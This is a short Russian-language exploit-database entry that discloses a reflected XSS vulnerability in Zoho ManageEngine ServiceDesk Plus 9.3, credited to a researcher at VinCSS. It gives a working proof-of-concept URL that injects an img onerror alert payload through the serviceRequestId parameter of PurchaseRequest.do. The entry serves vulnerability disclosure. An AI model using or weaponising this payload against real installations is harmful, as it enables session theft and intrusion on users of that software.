
Эксплойт XSS для Zoho ManageEngine ServiceDesk Plus 9.3 через параметр serviceRequestId в PurchaseRequest.do, демонстрирующий уязвимость отражённого межсайтового скриптинга.
Информация Описание: Проблема была обнаружена в Zoho ManageEngine ServiceDesk Plus 9.3. Существует XSS через параметр serviceRequestId в PurchaseRequest.do.
Автор: Concobe из Tarantula Team - VinCSS (член Vingroup)
domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=1%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3E1